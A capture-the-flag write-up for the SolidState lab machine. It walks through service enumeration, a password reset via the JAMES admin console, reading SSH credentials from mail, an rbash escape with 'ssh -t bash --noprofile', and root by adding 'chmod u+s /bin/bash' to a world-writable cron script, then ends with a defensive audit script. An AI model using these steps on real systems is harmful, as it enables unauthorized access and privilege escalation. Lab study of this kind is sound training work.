Enum

NMAP

Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-31 17:42 EDT
Nmap scan report for 10.10.10.51
Host is up (0.058s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp   open  smtp        JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.16.65 [10.10.16.65]),
80/tcp   open  http        Apache httpd 2.4.25 ((Debian))                                                                                                                      
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp  open  pop3        JAMES pop3d 2.3.2
119/tcp  open  nntp        JAMES nntpd (posting ok)
4555/tcp open  james-admin JAMES Remote Admin 2.3.2
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel                                                                                                      

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                                                                 
Nmap done: 1 IP address (1 host up) scanned in 24.65 seconds 

Port 80 doesn’t show anything of interest.

Searching for james on Exploit-DB shows an RCE that appears to work against JAMES Remote Admin 2.3.2.

┌──(bob㉿kali)-[~/htb/solidstate]
└─$ searchsploit james                   
------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                       |  Path
------------------------------------------------------------------------------------- ---------------------------------
Apache James Server 2.2 - SMTP Denial of Service                                     | multiple/dos/27915.pl
Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasploit) | linux/remote/48130.rb
Apache James Server 2.3.2 - Remote Command Execution                                 | linux/remote/35513.py
WheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow                  | windows/remote/944.c
------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Let’s try the Metasploit module.

Neither cron nor bash completion appears to work as a target.

Since we have root access to the admin panel, we can list the users and reset mindy’s password:

Existing accounts 6
user: james
user: thomas
user: john
user: mindy
user: mailadmin
setpassword mindy password
Password for mindy reset

So we connect to the mail server and authenticate as mindy:

┌──(bob㉿kali)-[~/htb/solidstate]
└─$ telnet 10.10.10.51 110                                                                                                                                                                                                                1 ⨯
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready  
user mindy
+OK
pass password
+OK Welcome mindy 

[...]

RETR 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,


Here are your ssh credentials to access the system. Remember to reset your password after your first login. 
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. 

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James

mindy:P@55W0rd1!2@

With mindy’s creds we get user.txt.

We also note that we are not in a normal shell; this user’s shell is rbash:

mindy@solidstate:~$ sudo -l
-rbash: sudo: command not found

Since we are in a restricted rbash shell, we can have ssh run a command instead of the usual login session:

┌──(bob㉿kali)-[~/htb/solidstate]                                                                                      
└─$ ssh mindy@10.10.10.51 -t "bash --noprofile" 

This escapes the restricted shell and gives us a normal bash shell.

Running pspy32, we notice that a Python script is being executed by root at intervals, which suggests it is run from a cron job.

We notice that we have write access to the script.

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls -al /opt/
total 16
drwxr-xr-x  3 root root 4096 Aug 22  2017 .
drwxr-xr-x 22 root root 4096 Jun 18  2017 ..
drwxr-xr-x 11 root root 4096 Aug 22  2017 james-2.3.2
-rwxrwxrwx  1 root root  105 Aug 22  2017 tmp.py

We use the example mentioned here by editing the script and inserting chmod u+s /bin/bash

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ /bin/dash 
# whoami
root
#
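
From the defender's side, the root shell above comes down to two conditions on the host: a root-executed script that any user can modify (/opt/tmp.py, mode -rwxrwxrwx) and, afterwards, a shell carrying the setuid bit. The audit script below is an added example, not part of the original writeup; its function names and output labels are made up for illustration, and the operator supplies the paths to check.

```sh
#!/bin/sh
# Added example: audit checks for the two misconfigurations seen above.
# Paths are supplied by the operator; function names are illustrative.

# ls-style mode string (e.g. -rwxrwxrwx), following symlinks.
mode_of() { ls -ldL -- "$1" 2>/dev/null | cut -c1-10; }

# True if group or other has write permission on the path itself.
loosely_writable() {
    case $(mode_of "$1") in ?????w*|????????w*) return 0 ;; esac
    return 1
}

# True if the setuid bit is set (s or S in the owner-execute column).
is_setuid() {
    case $(mode_of "$1") in ???[sS]*) return 0 ;; esac
    return 1
}

# Audit a file that root executes (cron job, service script, ...).
# Prints one finding per line; returns 0 if a non-root user could alter it.
audit_root_script() {
    f=$1; found=1
    if loosely_writable "$f"; then
        echo "WRITABLE-FILE $(mode_of "$f") $f"; found=0
    fi
    d=$(dirname -- "$f")
    while :; do     # a writable parent lets the file be replaced outright
        m=$(mode_of "$d")
        case $m in
            d????????[tT]*) ;;  # sticky bit: others cannot replace the file
            *) if loosely_writable "$d"; then
                   echo "WRITABLE-DIR $m $d"; found=0
               fi ;;
        esac
        if [ "$d" = / ] || [ "$d" = . ]; then break; fi
        d=$(dirname -- "$d")
    done
    return $found
}

# List setuid shells named in a shells file (default /etc/shells).
setuid_shells() {
    grep -v '^#' "${1:-/etc/shells}" 2>/dev/null | while read -r sh; do
        if [ -n "$sh" ] && is_setuid "$sh"; then
            echo "SETUID-SHELL $(mode_of "$sh") $sh"
        fi
    done
}
```

On this host, `audit_root_script /opt/tmp.py` would report the file itself, and `setuid_shells` with no argument reads /etc/shells.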